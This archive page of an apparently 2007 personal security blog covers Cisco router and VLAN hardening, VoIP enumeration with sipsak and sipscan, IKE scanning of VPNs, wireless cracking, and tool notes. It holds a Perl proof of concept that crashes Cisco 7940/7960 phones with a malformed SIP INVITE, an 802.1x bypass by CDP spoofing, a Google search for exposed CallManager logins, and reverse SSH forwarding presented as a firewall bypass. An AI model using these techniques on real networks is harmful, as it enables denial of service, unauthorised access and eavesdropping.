Saturday, March 31, 2007

Cisco 802.1x Voice VLAN Authentication Bypass Vulnerability

Ok, last night i blogged about VoIP enumeration techniques and well it made me want to find exploits for Cisco products. I was reading at jake report and i must admit the guys at fishnet security do write excellent report. In the report, he mentioned that it is possible to bypass 802.1x port based secuirty by spoofing CDP packets and allow an attacker to gain access to the voice VLAN. Below depicts a short summary:

"Cisco switches are susceptible to an authentication bypass vulnerability, allowing attackers to gain anonymous access to the voice VLAN.

Attackers may spoof CDP packets, and impersonate a Cisco IP phone, in order to anonymously join the voice VLAN. This allows attackers to gain access to network resources without the expected 802.1x authentication sequence. As network administrators expect that switch port access is restricted to only authenticated users, a false sense of security may pervade.

Once attackers gain access to the voice VLAN, they may be able to launch further attacks against servers and other hosts, or eavesdrop on VOIP conversations. Further network attacks are also possible at this point."

I guess the authentication mechanism behind is the Extensible Authentication Protocol. Please go through the whole report because it is so good that it made me read twice. The report talks about the spoofing techniques, attack scenario and mitigation steps. The full report can be found here

As for spoofing CDP packets, you can use a tool call yersinia. This tool has multiple uses and one of those also includes being STP root. The installation for this tool is a pain for me, with the usual ./configure, make, make install. Howver i found a good site which allows you to download the package and install it off using dpkg -i yersinia_0.7.1-0.2_i386.deb. The link to the site is: http://www.enrici.com/debian/yersinia/0.7.1/. Below are pictures of the yersinia tool. You can use it off the GTK mode or Ncurses GUI.



BotMaster Spamming



Generating mass traffic to your site in a small amount time = spamming? Ok, i just came across this tool from botmaster.net. Well, personally i wouldn't use this tool at all. What if someone reports me to the authority? Or what if someone proxy forward all the traffic to a FBI webform? On the other hand, you can earn money by telling someone that you can help his/her site to rank no 1 in google, but well that is conning to me. I once had a colleague who wanted his site to be rank 1 in google so badly that he is willing to pay USD $2000 for a service. That is crazy money for a proclaimed statement by any company. Well, i don't trust all these so called "SEO service" either. They either con you and say bye bye or they might drag the process to make you rank No 1 in google. I will let you guys to think what this tool can do good or do damage for you. Let me know?

For more on how to prevent yourself from being compromised by this tool, visit below:
sla.ckers

For the demo of this tool and how it can be used, visit below:
http://www.botmaster.net/movies/XFull.htm
http://www.botmaster.net/movies/XDemo.htm

Friday, March 30, 2007

VoIP Enumeration Technique released

Ok, i finally managed to finish my VoIP enumeration experiments and now its time to blog it here. I know it has been long waited, but well, i was rather busy with some other stuffs too. Before i start, i presumed that most of you guys who is reading my blog will have some basic knowledge of how SIP signaling works. There is a plethora of information regarding how SIP signaling works, so just google up and you will find it. The one i visit most is at iptel.org. In this experiment, the tools used are nmap, siVus, sipsak, ser pbx, debian OS, netcat, solarwinds toolset, x-lite softphone and wireshark.

Enumeration is the most important step in all hacking activities. Without a successful enumeration, you wouldn't know if a pbx server is running or what other services is running, so successful enumeration will lead to successful hack. I guess most of you guys know about the three way TCP handshake. Nmap can be used to perform SYN, ACK, Xmas, TCP and other scans. As for VoIP, there is no such options and the best open source tool to use is sipscan or maybe siVus. There are three different scans that can be used to perform a VoIP enumeration and they are the INVITE, OPTIONS and REGISTER request. You guys have to know how handshaking takes place for all three requests. Different scans will yield different result and if the pbx server is harden or patched, then enumeration becomes a little tricker.

I had managed to setup a SER pbx server without any mysql authentication. This is just for testing purpose only. The Session Initiation Protocol works quite similar to HTTP. With requests you get responses. The requests can be INVITE, REGISTER, OPTIONS, SUBSCRIBE, NOTIFY, REFER, CANCEL, BYE and the response is a number like 100, 180, 200, 303, 408, 500, 603 and many others. For a full list please refer to iptel's website. A successful request will always give a response 200 code, so please take note of that. For the screen shot below, i had successfully sent a INVITE request and you guys can see how the handshaking in wireshark take place.

This tells us that the user does exist in the pbx server, else a 401 or 404 response will be shown. Try this, setup a mysql authentication service and you wont see a 200 response code.

Below shows a screenshot of a REGISTER request. Notice the handshaking is different from the INVITE request.

A REGISTER request allows a user to register its username, password and some other details into the REGISTRAR. So as shown above, the pbx server does allow me to register.

You can use the serctl ul show command to see a list of users as shown below:

I had register two users, Ronald and test.

On the softphone side, if the pbx is setup correctly, all you have to do is launch the softphone and it will automatically register itself to the SER database.(Without authentication for my experiment) The softphone is easily to configure, you will have to enter the correct settings. Below shows a successful registration of the softphone to the pbx server.


To start the SER service, go to /etc/init.d and type sudo SER start. Once the service is started, you will see some text as shown below:


To check the SER service running in debian, use ps -ef | grep SER as shown below:


To monitor the responses omitted by the pbx server, issue the serctl moni command as shown below:

From the output, you can clearly see the highlighted 2XX response. This shows that there are 2 requests at the moment of testing and both requests are accepted. However, all other responses like 3XX, 4XX, 5XX or 6XX are 0. Which means that there is no bad requests supplied to the pbx server and so the server is not omitting any bad response.

Ok, now comes the enumeration technique. I use netcat to see if i am possible to successful see any response from the server. From the output of netcat, sad to say, there is no response from the server. Its either i type wrongly or the server is configured by default not to show responses. A snippet of netcat is shown below:


siVus was used next to scan the pbx server. The result only displays the port number and the User Agent(UA) which is x-lite softphone. It doesnt show the version or the software of the pbx server.


Sipscan was next. Because there is no authentication setup in the pbx server, all the responses from sipscan gived a 200 response. This means that if an attacker knows the ip of my pbx server, all he needs is just use a softphone and he can register without any password and start using the VoIP service. Of course, in the real world scenario, most pbx server is setup with passwords. My point here is, because my pbx server is setup without any authentication, that is why all the you see a 200 OK response. However, if a pbx server is setup with password, based on the different scan requests with INVITE, REGISTER and OPTIONS, you will see a 4XX response from the pbx server. This will allow you to enumerate user accounts. So after multiple tries and if you see a response like 401, you know that a user exist in the database and it requires authentication. Well, that is good enough having the username of the user. You had successfully enumerated a user in the database. This is a long process. However, you can always write a script to automate this process or you can choose to use sipscan which comes with a default userlist. You will have to update this list to perform a dictionary scan. Below is a snippet of sipscan:


Sipsak is known as the "swiss army knife " which blends well with SER and x-lite softphone. The options i use for sipsak is as below:

Send an OPTIONS request to test@192.168.1.23 and display received replies.

sipsak -vv -s sip:test@192.168.1.23


Trace the SIP path to test@192.168.1.23

sipsak -T -s sip:test@192.168.1.23


Insert a forwarding contact for myself at work to me at home for one hour and authenticated with password if required.

sipsak -U -C sip:WW@home -x 3600 -a password -s sip:WW@192.168.1.23


A usrloc test with additional invites send to the user.

sipsak -U -I -s sip:test@192.168.1.23 -vv


Send the instant message "Hell time!" to the colleague and show result:

sipsak -M -v -s sip:test@192.168.1.23 -B "Hell time!"

To update your hacking toolset you can visit this page: http://www.forinsect.de/pentest/pentest-tools.html

Of course, you can perform more VoIP hacks. The enumeration technique is just one part of it. Too see more VoIP hacking tools and its purpose, check this site out:
http://www.voipsa.org/Resources/tools.php. It has a whole suite of tools for VoIP. Each section has different specific use.

A point to note, please disable any SNMP services in any VoIP devices. Set a strong unguessable public and private SNMP community string if you need to use SNMP, or better still, use SNMP version 3 which provides strong authentication. Below is a snippet of solarwinds. You can use solarwinds to search for the MID and the OID for a specific vendor. Once the vendor is found, a wealth of information will be disclosed. This all happens if you use the default public community string, so keep that in mind.


Lastly, do you know that hardware VoIP phones download configuration setting file from TFTP servers to their firmware upon starting up. Most of us knows that TFTP server runs on UDP port 69 and provides no authentication. So what if you can compromise the TFTP server? You can then actually place rogue files in the servers to corrupt the hardware phones. Well, if you ask me how to check for the TFTP server IP address, you can always check it with your phone settings and normally one of the option will show you the TFTP server IP address. The Cisco IP phone 7940 and 7960 actually does show it. See my previous post. The best way to protect anyone from accessing the TFTP server is to use access-list to permit only certain IPs that can use the TFTP server. Well, there is more than just enumeration and this is just the beginning of VoIP hacking or you can call it phreaking. Once a successful username is found, you can perform MiTM sniffing to capture voice calls and also if you see my previous post, you can actually perform a rerouting of calls. This is all for now. I hope you guys like it. Let me know what you guys think?

Cisco PIX Firewall capture command

Ok, so most of us knows about packet sniffer like tcpdump and wireshark. These two are the best open source sniffers that is freely available in the market today. But, most of us also know that majority of the company are using switches now rather than the good old hub because of the bad architecture of how a hub works. Well, to sniff all traffic from a switch you would need to perform ARP spoofing, but to sniff traffic from a hub, just install your sniffer on your machine and start sniffing from the network. Well, i guess for cisco switches, you can try to install Cisco Dynamic Arp Inspection to defeat ARP spoofing. Personally, i had not tried that, but you can read more about it here: http://www.cisco.com/en/US/products/hw/switches/ps708/products_configuration_guide_chapter09186a00804357b1.html

My point today is not about ARP spoofing, instead i would love to talk about the capture command from the PIX firewall. This command functions almost like a sniffer where you can choose to sniff all the traffic that traverse through the firewall. Besides that, you can also do filtering based on IP addresses and port numbers. Moreover, this command can also be used for troubleshooting if you were to setup multiple servers or networks. Personally, i had tried it 2 years back when i was configuring a firewall, and there is no questions about it that it is so good to have a sniffer like command in the firewall. Well, I shan't go deep into details of how to use or configure this command, because a simple yet detailed article had been published. Let me know what you guys think?

http://www.computernetworkinghelp.com/content/view/40/1/

Telespoof

Ok, this is my 50th post and i am going to introduce a service call spoofing caller ID. I had known this service a few months back, but it just came into my mind that i had to blog this. Personally, i had not tried it before, so i can't really comment on it. From the reading the FAQ, it is cheap, anonymous and best of all it is simple. Imagine this, calling without anyone knowing your real number? What can you do with it? hehehe, i will let you guys run wild imagination...


http://www.telespoof.com

Thursday, March 29, 2007

Cracking Wireless Network

Ok, i bet most of the people do know how to break wireless networks, but still it is good to post it here. The software that i am going to use is Aircrack-ng. The reason i use this software is because it is open source, fast and has a suite of tools that can perform a hell lot of tasks. Ok, so in order to sniff and break wiressless networks, you will need to place your wireless network card in promiscuous mode and sniff sufficient amount of Initialization Vectors. For more information on how many IVs to sniff, please visit the aircrack-ng website. To crack WEP, it is as simple as 123, as long as you have enough IVs. But to crack WPA, because of the 4 way handshake authentication protocol, you would need to sniff until a handshake takes place between a wireless client and the access point and force the client to reauthenticate, and then you can start a deauth attack with aireplay-ng. For more information, please read here the faq at http://www.aircrack-ng.org/doku.php?id=faq. Make sure you go through it.

Googling Cisco Call Manager and Extra VLAN config

ok guys, this is the final series of VLAN configurations i made. Unitl i made new discoveries, enjoy these:


Configuring VLAN 10 on multiple interfaces.


Configuring dynamic trunk on multiple interfaces, please note that it is not secure due to VLAN hopping.


Configuring telnet on the switches, now EVERYONE knows it is very insecure. Use ssh instead


Configuring IP address on the vlan interface.

Ok, as i am still doing the VoIP testing methodology for you guys, i happen to stumble across a this:

This is bad practice, but only 4 companies managed to get on the google list. The string is inurl:"ccmuser/logon.asp"

Wednesday, March 28, 2007

VoIP Auditing Tools

Ok, so i am going to go attend a hacking course in Hack in The Box with The Grugq. Yes guys, i do know how to audit VoIP, but i would love to learn advanced VoIP hacking from the best of the west. If you guys read the HITB website, he developed a tool called Tactical VoIP Toolkit which does basic and advanced attacks. Just a few minutes ago, i found another commercial tool called VoIPaudit which cost USD $10000. Personally, i feel that open source tools are much and way better than close source. I don't know how this tool fair, but i think it is way too pricey to buy. Well you can get it from here if you have the money to spare. I will update you guys once i try the tool from the Grugq. And yes, i am still working on basic VoIP auditing on my PBX right now, i had captured screenshots and am going to release here once i am done. Let me know what you guys think?

TCNiSO Modem Hacking

Ok, i almost forgot about DerEngel for some time now. I was reading his book "Hacking the Cable Modem" 2 months back and i was really amazed by how small little things he found would lead to bigger hacks. The book is very insightful and teaches you how to do soldering and do modem hacking. Well, i am not good in reverse engineering, programming nor soldering. However this book really made me looked into how "real" hackers actually worked. In the end, it all boils down to teamwork for a successful hack. Buy this book if you are interested in modem hack or visit his website at http://www.tcniso.net/. You can find videos and other extra stuff that you won't find elsewhere. Below is a small image of the book and the excerpts



"When shopping for cable modems, you'll come across several different kinds. Almost all cable modems available in retail stores are DOCSIS-certified, which means that they will work on the network of any Internet service provider that supports DOCSIS. Most new cable modems come with an Ethernet port, a coaxial connector, and a Universal Serial Bus (USB) interface. More expensive models may come with additional features, such as Voice over IP (VoIP) support or a wireless access point (WAP)." From chapter 2, The Cable Modem Showcase

Yet Another Content Generator

Ok, guys listen yup. If you have a site and would love to boost your contents, please try YACG. It is open source which means it is free. You can also include your own scripting code if you know how to code and best of all, it is easy to use and you can cuztomize it. Check it out here: http://getyacg.com

"It's based on hooks so you can add your own code without having to change anything, also it's very intuitive. For example, if you have a page about 'Ferrari' and you put the script will automatically display a video from Youtube related to 'Ferrari'. There are a lot of hooks like that, and more being developed!"

Testing for Cisco VPNs


Note: image from ike-scan wiki

Ok guys, I know ike-scan is out there for some time, but still i would love to blog about this. Cisco VPNs runs on UDP port 500 and most of us knows that Cisco VPN Concentrator 3000 is vulnerable to multiple attacks like DoS and Buffer Overflow. ike-scan will actually test for the presence of VPNs and check if the VPN is able to be forced into the Aggressive mode for cracking later on. And once the PSK is cracked, connection to the vulnerable server should be no problem. Personally, i had tested multiple VPNs and only find a Cisco VPN Concentrator 3000 vulnerable. Well, if you would love to know how to pen-test VPN, check out the following articles below:

http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide
http://www.securityfocus.com/infocus/1821

It will be very useful if you can go through the whole article and understand how IPSec works. As a penetration tester, below are the few commands i always used in the command prompt:

C:\ikescan>ike-scan xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.531 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -auth=3 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -auth=1 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -auth=64221 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -sport=0 -auth=64221 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --vendor=00 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.453 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --vendor=f4ed19e0c114eb5
16faaac0ee37daf2807b4381f xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.453 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx 443

As you can see the list goes on and on. In the last example highlighted in black, i specify the port to check if the VPN is running at port 443. I know Nortel can have VPN gateways running on SSL. The above results are from a Nortel VPN Gateway.

If you successfully found a vulnerable VPN server, the response would be as shown below:

C:\ikescan>ike-scan -v -s 0 xx.xx.xx.xx
Starting ike-scan 1.8 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
xx.xx.xx.xx Main Mode Handshake returned HDR=(CKY-R=fb07f15c64c1fef9) SA=(En
c=DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VI
D=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.8: 1 hosts scanned in 0.114 seconds (8.77 hosts/sec). 1 retur
ned handshake; 0 returned notify

--------------------------------------------------------------------------------------------------


C:\ikeprobe>ikeprobe xx.xx.xx.xx
IKEProbe 0.1beta (c) 2003 Michael Thumann (www.ernw.de)
Portions Copyright (c) 2003 Cipherica Labs (www.cipherica.com)
Read license-cipherica.txt for LibIKE License Information
IKE Aggressive Mode PSK Vulnerability Scanner (Bugtraq ID 7423)

Supported Attributes
Ciphers : DES, 3DES, AES-128, CAST
Hashes : MD5, SHA1
Diffie Hellman Groups: DH Groups 1,2 and 5

IKE Proposal for Peer: xx.xx.xx.xx
Aggressive Mode activated ...

Attribute Settings:
Cipher DES
Hash SHA1
Diffie Hellman Group 1

0.000 3: ph1_initiated(00443ee0, 003b4760)
0.016 3: << ph1 (00443ee0, 244)
0.016 3: >> 84
0.016 3: sx_recv_notify: error 14
0.016 3: sx_purge_spi: implement me - 0
2.516 3: << ph1 (00443ee0, 244)
2.516 3: >> 84
2.516 3: sx_recv_notify: error 14
2.516 3: sx_purge_spi: implement me - 0
5.531 3: << ph1 (00443ee0, 244)
16.047 3: >> 84
16.047 3: sx_recv_notify: error 14
16.047 3: sx_purge_spi: implement me - 0
19.547 3: ph1_disposed(00443ee0)

Attribute Settings:
Cipher DES
Hash SHA1
Diffie Hellman Group 2

19.547 3: ph1_initiated(00443ee0, 003b4c08)
19.578 3: << ph1 (00443ee0, 276)
19.578 3: >> 437
19.625 3: ph1_get_psk(00443ee0)

*****************************************************************************
* System is vulnerable!! See http://www.securityfocus/bid/7423/ for details *
*****************************************************************************

Tuesday, March 27, 2007

VLAN Trunking Protocol configurations

Ok, here is my next installment, configuring VTP. How VTP work is you configure VLANs in your switch and this information is propagated throughout to other domain in other switches with the VTP advertisements. As you know that VLAN hopping attacks is possible by enabling Dynamic Trunking Protocol, so here in my configuration, i manually configure the trunk instead of using DTP. This is shown in my example with the command "switchport mode trunk". In my configuration, i had also set a VTP password for protection. Lastly, VTP domain name must be set on the switch, else no VLANs can be configured on the switch. For more detailed exaplaination and configuration samples, please visit this link here:

http://www.cisco.com/warp/public/473/21.html

Monday, March 26, 2007

The Tipping Point

Been reading a lot on the book "The Tipping Point" by Malcom Gladwell. For those of you who are inspired to accomplish big things in life, you should read this amazing book. It illustrates how small little things in life can actually spread rapidly throughout the world and consider them as epidemics. For those who loves marketing or starting to build a brand for yourself, this is absolutely the book for you. An excerpt from the book in chapter 2:

" Epidemics have three primary characteristics:

1) contagiousness
2) rapid change
3) very importantly, small changes can have big effects

The "Tipping Point" is the moment of critical mass when rapid change occurs.

When an Epidemic Tips, it tips because of a change in one of the follow:

The Law of the Few - social epidemics are driven by the efforts of a talented few. Gladwell characterizes them as: Connectors - people specialists who know many people, Mavens - information specialists who love to spread information, and Salesmen - persuasion experts. It turns out I am not one of these few :)

Stickiness Factor - does the message make a significant impact? Small but critical changes to a message can radically affect its stickiness. The quality of the message is not the issue.

Power of Context - humans are incredible sensitive to context. For example, removing graffiti and subway fare cheaters substantially reduced serious crime in New York City subways."

sla.ckers

Ok, just got a message from Rsnake giving me the permission to use his banner. Rsnake is one of the top web application god in the Web application industry today. I am a huge fan of him and is constantly visiting his forum and blog to gain new sights and information. Recently, people from sla.ckers forum designed a cool banner to be used in the sla.ckers forum and since i am one of his fan, i got to blog his banner down here. Feel free to visit the sla.ckers here:

http://sla.ckers.org/forum The lights you see in the banner is where all the ha.ckers are at work :)



Rsnake, how about a banner for Jeremiah? :)

Sunday, March 25, 2007

Cisco IOS Authentication Proxy Vulnerability

Ok, so does the authentication proxy which is vulnerable to remote exploitable buffer overflow condition. Well, this only affects cisco products which is configured for telnet and ftp authentication proxy. Fixes, mitigation and workaround had been published here:

http://www.cisco.com/warp/public/707/cisco-sa-20050907-auth_proxy.shtml

CBAC vulnerabilities

Ok, last night i blogged about CBAC and its powerful features. It is really a useful feature to have in your firewall. A sample configuration was included in that blog. Well, i only included a small snippet of the configuration but the fact is there is more than that. If you explore deeper, you will find additional features for CBAC. Sad thing to mention is older version of IOS using CBAC suffers from DoS attacks involving fragmentation of IP packets. (you can use hping to actually do fragmentation) So please patch your IOS version. More information can be found here:

http://www.cisco.com/warp/public/770/nifrag.shtml

Unfortunely, CBAC also suffers from another vulnerability which allows denied traffic to pass by the dynamic ACL. More can be found here:

http://www.cisco.com/warp/public/707/IOS-cbac-dynacl-pub.shtml

Boosting Linksys Router Signal

Ok, i happen to stumble across this site http://www.thibor.co.uk/ where you can upgrade your linksys router firware to enhance your signal strength. So, thats to say that no antennas or any range boosters. Well, sad to say that they only support a few models of linksys routers and mine is not included in their list :(

More support for linksys products can be found here: http://www.linksysinfo.org/index.php

IP NAT Pool

Ok, last night i did a small configuration for NATing. I guess most networkers would know what NAT is used for so the configuration is shown as below. Well, in this example you would see the serial interface is down. This reason is simply because i set the interface to a private ip range instead of the public range. As for the other commands, it is pretty simple though. Well, this is just a basic NAT configuration.

Saturday, March 24, 2007

Other Cisco Security Router features.

Alright, the other day i provided a list of features that can be used to harden the Cisco router and i am going to finish it here today with the commands.
For PAM to work, you can issue the commands below:

config t
ip port-map telnet port smtp 2525
exit


This will map a standard smtp port which is port 25 to a non-standard port 2525. You can also attached an access-list to restrict only a specfic hosts or user to the smtp server using list xx (where xx is the access-list number) at the end of the ip port-map command.


Cisco Firewall comes with basic configuration for IDS by default. However, you can always add on for more signatures and advanced configuration settings to thwart off attacks. For IPS and IDS configuration, refer to the link below for more detailed step by step explaination:

http://www.cisco.com/en/US/products/sw/iosswrel/ps1835/products_configuration_guide_chapter09186a00800ca7c6.html


Setting up an authentication proxy in the Cisco router using tacacs+. This will require user to authenticate first before allowing traffic to the internet.

config t
aaa new-model
aaa authorization auth-proxy default group tacacs+
aaa authorization auth-proxy default group tacacs+
tacacs-server host 192.168.1.4
tacacs-server key cisco
ip auth-proxy name httpAuthentication http
interface Ethernet0/1
ip auth-proxy httpAuthentication
exit


Use the show ip auth-proxy cache to check for user statistics. A sample example can be found below:

http://www.cisco.com/en/US/products/sw/secursw/ps1018/products_configuration_example09186a008009466e.shtml

Transparent Layer 2 Firewall

Ok, i got to blog this. Personally i had not configure a Layer 2 transparent firewall in a Cisco Router but this seems interesting, useful and powerful feature to me. I never knew that modern cisco routers have Layer 2 firewall capabilities until this very moment. This transparent firewall somehow works similarly to Layer 3 firewall except that it is totally transparent and requires bridging to be configured. Both Integrated Routing Bridging (IRB) and Bridge Virtual Interface (BVI) needs to be configured in order for it to work.

" A transparent Cisco IOS firewall acts as a Layer 2 transparent bridge with context-based access control (CBAC) and ACLs configured on the bridged interface."

So, transparent firewalling works in accordination with CBAC too which provides even more stringent security measures against interfaces. So on the same router, i can have both Layer 2 and Layer 3 firewall running at the same time with IRB providing Layer 2 bridging on interfaces and BVI providing Layer 3 routing of packets. A detailed step to step configuration and explaination can be found here:

http://www.cisco.com/univercd/cc/td/doc/product/software/ios123/123newft/123t/123t_7/gt_trans.htm

I am looking forward to configure a Layer 2 transparent firewall one of these days :)

CBAC configuration example

The other day i was blogging about Cisco's CBAC feature that can be used a application firewall to monitor application layer protocols. Since it creates only session tables based on outbound traffic and blocking inbound traffic, this feature also blocks port scanning, a common technique used by hackers. If someone tries to port scan using nmap or some other tools, because this feature is blocking inbound connections, the port scans yields nothing useful, thus protecting the servers and shield off most hackers. Below is a basic CBAC configuration example.

config t
access-list 123 deny ip any any
access-list 129 permit tcp any any eq smtp
ip inspect name smtp tcp
interface Serial0/0
ip access-group 123 in
ip access-group 129 out
ip inspect smtp out
exit


Issue the show ip inspect allto see all configuration rules or show ip inspect sessionsto see the current CBAC in action.

And you can read more at the following links:

http://www.ciscopress.com/articles/article.asp?p=26533&seqNum=5&rl=1 (configuration step by step)

http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/120newft/120t/120t1/fw3600.htm (sample scenario)

http://www.cisco.com/en/US/products/sw/secursw/ps1018/products_configuration_example09186a008064730a.shtml (simple example)

http://www.ciscopress.com/articles/article.asp?p=26533&rl=1 (CBAC to protect DoS)

Friday, March 23, 2007

Cisco to develop its own mobile handhelds

Ok, today i was wondering about Cisco developing its own handhelds to compete against mobile giants like Nokia, Siemens and a few others. Microsoft has its own handheld and OS, Apple is about to launch iphone, but what if Cisco starts developing its own handhelds. Personally, i think they have a huge edge in the handheld market. Cisco is the product leader in networking and if they really do develop handhelds, it will be interesting to see many cutting edge features incorporated to the existing technology. Let me know what you think.
Just a thought.

OSPF Attacks

Last night, i tried to play around with a very basic OSPF configuration and the below depicts my config. Its the simplest form of OSPF configuration without any authentication.



The other night i was talking about OSPF and the ability that this protocol is able to divulge a lot of information by sniffing from the network that uses OSPF. If you have physical access to the router, you could also issue commands like show ip ospf , show ip ospf database and some other show ip ospf commands.

OSPF HELLO packets are sent every 10-30 seconds and routing updates are sent every 30 minutes. The hello packets are the ones with the most juicy info. Some of them are Router ID, Area ID, Designated Router, Authentication, etc..Well, so far i had only know that injection of malicious route and Man-in-the-Middle attacks is possible. Once a successfully neighbor relationship establishes between DR and BDR, all traffic can be directed to the newly inserted route before passing all other routes. For more reference on how this can be done, please see below:

http://www.gomor.org/cgi-bin/ospfash.pl?mode=view;page=it_underground_2007

Hydra and Cisco Torch

Ok, tried dictionary attacks, brute forcing and fingerprinting a Cisco router today. The tools used are THC hydra and Cisco Torch. The password is hard to guess, that is why hydra couldnt picked it up nor Cisco Torch. I must admit that hydra is such a wonderful tool to have, it fast and waste no time. On the other hand cisco torch is slower, but still gets the job done. p0f is a tool used for passive and active fingerprinting. I would say i would love to use a third tool (SinFP) to actually double verify the IOS version and device running. Unfortunately, SinFP crashed on my machine and i did not probe further.

Well, the command to the tools are:

Nmap: nmap -sV -A -P0 -O -vvv -sS 127.0.0.1

hydra: I prefer to use the GTK

p0f: Because i did a pssive fingerprinting, so i actually save a pcap file first using wireshark and use p0f to run over it. So the command is:
p0f -s cisco.pcap -V -A
The -A is to acutally see the SYN/ACK packet return from the router.

SinFP: sinfp.pl -ai 127.0.0.1 -p 23

Cisco torch: ./cisco-torch.pl -t -b 127.0.0.1

I am going to write a methodology on enumerating VoIP soon, so stay tune.

Wednesday, March 21, 2007

Cisco IP Phone 7940/7960 vulnerable to DoS

Ok, this is bad. Cisco IP Phone 7940/7960 is vulnerable to DoS. After sending a malfored crafted SIP INVITE message, you can cause the IP Phone to reboot. This is due to the phone lacking the function to check the validity of the sipURI field of the remote party. This will affect Cisco IP phone 7940/7960 running firmware P0S3-07-4-00.

Unaffected firmware: POS8-6-0



Ok, so i am not vulnerable. :)

Proof of Concept:

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 " unless ($ARGV[2]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);

$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nTo: \r
\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r
\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);

#end

No 1 in google

Ok, i finally made it after 2 months of blogging. My blog has been googled up as no 1. Great thanks to Jeremiah Grossman for this one, he gave me the best advice. I am still pentesting the Telecom as of writing now. I found a lot of interesting things. I even found UDP port 5060 running which is SIP. I am still performing enumeration on this port as it might be false positive after all. Will let you all know soon. Stay tuned.

Tuesday, March 20, 2007

SSH Dynamic and Reverse port forwarding

Dynamic Port Forwarding
Ok, i know some of you guys already know how to use Dynamic port forwarding and reverse port forwarding. For those who don't know, this is it. Dynamic port is very useful in this country. This country is blocking a lot of websites. So in order to bypass it, i use dynamic port forwarding. This will actually pass all traffic over the SSH tunnel, which is also secure because of encryption. But be prepared to experience slowness in speed. SOCKS5 must be an option when using Dynamic port forwarding. Below is a simple diagram where in the first diagram, a user connect straight to the internet. In the second diagram, all traffic will pass by a SSH tunnel and encrypted before reaching the destination.

User -------------> Internet

User --------> SSH tunnel ----------> Internet

The command to do so at the SSH server is: ssh -D 1080 user@remoteserver.com

Open a browser or any application which supports SOCKS5, enter the settings as shown below.



Close the browser and try to surf. There you go, all HTTP traffic is encrypted over a SSH tunnel. So if someone is sniffing the traffic, all he sees is gibberish encrypted text.


Reverse Port Forwarding

Reverse port forwarding is like a remote shell. This technique atually allows you bypass firewall rules. If a firewall is blocking inbound access on port 22(SSH), you can setup a port in the SSH server which is behind the firewall, and reconnect to it as and when you need it. This is known as Reverse port forwading.

On the SSH Server, type: ssh -R 1080:localhost:22 user@your-home-external-ip.com

When you reach home, you type this on your client: ssh -p 1080 user@localhost

Advanced Cisco Router Security

Ok, i got to speak a little bit about advanced cisco router security settings. I had been configuring cisco devices since 2002 and when i looked back, i realised that my configuration is not secure at all. There are so many loopholes here and there hanging around. If an attacker were to use a port scanner, then he would be able to actually see all the open ports and services that is present in the router. That's a bad bad configuration by me. Well, every man make mistakes and learn from there onwards. Its 2007 and well, i had learnt my mistakes the hard way, so here is the improve sample configuration from me. However, please note that they are not in order.

